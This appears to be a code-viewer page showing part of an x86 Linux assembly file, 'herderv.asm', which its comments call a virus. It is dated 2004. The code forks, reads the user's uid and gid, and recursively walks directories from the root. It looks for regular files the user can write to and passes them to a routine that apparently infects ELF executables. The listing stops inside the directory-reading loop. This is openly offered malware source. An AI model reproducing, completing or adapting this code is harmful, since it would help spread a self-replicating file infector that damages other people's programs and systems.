📄 herderv.asm
字号:
;###################################################################;################### www.cyneox.tk #################################;###################################################################;;; 9.5.2004 by cyneox;------------------------------------------------------------------%define SYS_EXIT 1%define SYS_FORK 2%define SYS_WRITE 4%define SYS_OPEN 5%define SYS_CLOSE 6%define SYS_CHDIR 12%define SYS_GETUID 24%define SYS_GETGID 47%define SYS_READDIR 89%define SYS_MMAP 90%define SYS_MUNMAP 91%define SYS_STAT 106%define SYS_GETCWD 183%define HERDERV_SZ 0x1000%define STDOUT 1%define STAT_SIZE 64%define MMAP_SIZE 24%define DIRENT_SIZE 266%define STR_STAT_OFF 72 %define REG_FILE 10q%define IS_DIR 4q%define PATH_LENGHT 128 %define FIRST_DIR 0x2f%define FILE_STACK 50%define READ_WRITE 3%define MAP_PRIVATE 2%define ELF 0x464c457f.386.model flat, stdcalllocals;include win32api.inc.dataherder db "i l0v3 h3rd3r",0xa,0len equ $-herdersection .textglobal main.code;########################## MAIN #####################################main: pusha pushf push ebp ; push ebp; mov ebp,esp; sub esp,0; mov esp,ebp ; VERY IMPORTANT!!! DON'T WRITE "mov ebp,esp" ; !!!! FATAL CAUSES ! ; forking.. mov eax,SYS_FORK mov ebx,0 int 0x80 ; compare if parent or child is active cmp eax,0 jne parent ;######################## CHILD ######################################child: ; getting uid of user mov eax,SYS_GETUID int 0x80 ; pushing uid on stack... push eax ; [ebp-4]=[eax]=uid ; getting gid of user... mov eax,SYS_GETGID int 0x80 ; pushing gid on stack... push eax ; [ebp-8]=gid ; saving "space" for the stat structure needed later... sub esp,STAT_SIZE ; [ebp-72]=struct stat push dword 0 ; [ebp-76] push dword FIRST_DIR ; directory to begin to scan; [ebp-80] push dword 7 ; write permissions... ; scan FIRST_DIR ... call scan add esp,12 ; restoring stat structure add esp,64 ; restoring uid and gid add esp,8 ; here finishes the child jmp exit ;###################### PARENT ########################################parent: mov eax,SYS_WRITE mov ebx,STDOUT mov ecx,parent mov edx,len int 0x80 parent_process: pop ebp popf popa jmp old_prog old_prog: mov eax,1 mov ebx,0 int 0x80;###################### SCAN ##########################################scan: mov esi,esp add esi,8 ; [esi+8]=filename mov edi,esp add edi,4 ; [edi+4]=<write permissions> ;mov eax,esi ;call print_string ; defining some variables that our virus will need later... ;######## variables ######## sub esp,4 ; needed for fd sub esp,1 ; needed for permissions of the host file... 00-07 sub esp,1 ; file type : REG_FILE or IS_DIR sub esp,PATH_LENGHT ; needed for the path name of file.... ; we're going to *stat* our filename ... mov eax,SYS_STAT mov ebx,esi ; pointer to filename mov ecx,ebp sub ecx,STR_STAT_OFF ; ecx -> pointer to our stat structure int 0x80 cmp eax,0 jge ok_stat jmp err_stat ;#################### OK_STAT ########################################## ok_stat: ; first of all we must verify the permissions on directory/file mov ebx,ebp sub ebx,STR_STAT_OFF ; point to the stat-structure mov ax,[ebx+8] ; stat.st_mode=[ebx+8] : *take a look at ; the stat structure in asm/types.h* mov dx,ax mov cx,word [ebx+12] ; stat.st_uid=[ebx+12] cmp word cx,[ebp-4] ; [ebp-4]=uid of user je u_perms mov cx,word [ebx+14] ; stat.st_gid=[ebx+14] cmp word cx,[ebp-8] ; [ebp-8]=gid of user je g_perms cmp word [ebp-8],0 ; is this root(uid=0) ??? je u_perms ;################### O_PERMS ########################################## ; others permissions o_perms: and al,7q jmp perms ;################### U_PERMS ########################################## ; user permissionsu_perms: shr ax,6 and al,7q jmp perms ;################### G_PERMS ######################################### ; group permissionsg_perms: shr ax,3 and al,7q ;################### PERMS ########################################### perms: mov byte [esp+PATH_LENGHT+1],al ; store file permissions ; of user ;################## F_TYPE ########################################### ; now we must verify the file type: REG_FILE or IS_DIR f_type: mov ebx,ebp sub ebx,STR_STAT_OFF ; pointer to stat structure mov ax,[ebx+8] ; stat.st_mode=[ebx+8] and ax,170000q ; bit mask for file type shr ax,12 mov byte [esp+PATH_LENGHT],al ; store file type ; check if REG_FILE or IS_DIR ??? mov al,byte [esp+128] cmp al,4q je is_direc ; jmp if "file"==IS_DIR cmp al,10q je is_reg_file ; jmp if "file"==REG_FILE jmp err_scan ;###################### IS_REG_FILE ####################################### is_reg_file: ;mov eax,file ;call print_string mov ecx,[edi] and cl,2q cmp cl,2q je file_par_per ; if we have parent permissions on file jmp err_scan ;##################### FILE_PAR_PER #######################################file_par_per: mov cl,byte [esp+128+1] ; check if we have write permissions ; on file and cl,2q cmp cl,2q je file2 jmp err_scan;#################### FILE2 ##############################################file2: call check_file jmp err_scan;###################### IS_DIR ###########################################is_direc: ; saving curent working directory to the stack mov eax,SYS_GETCWD mov ebx,esp mov ecx,PATH_LENGHT int 0x80 ;mov eax,dir ;call print_string ; open directory... mov eax,SYS_OPEN mov ebx,esi ; esi=pointer to directoy(filename) mov ecx,0 ; O_RDONLY mov edx,0 int 0x80 cmp eax,0 jge ok_dir ; jump if(eax>=0) jmp err_scan ;~~~~~~~~~~~~~~~~~~~~~~~~ OK_DIR ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ok_dir: mov [esp+128+2],eax ; move filedescriptor to our stack ; variables ; move to that directory... mov eax,SYS_CHDIR mov ebx,esi int 0x80 ; alocate space for the dirent structure sub esp,DIRENT_SIZE ;~~~~~~~~~~~~~~~~~~~~~~~ READDIR ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ readdir: mov eax,SYS_READDIR mov ebx,[esp+DIRENT_SIZE+128+2] ; fd mov ecx,esp mov edx,1 int 0x80 cmp eax,1 jne near err_readdir ; we'll seach every file and then we'll call scan for it⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -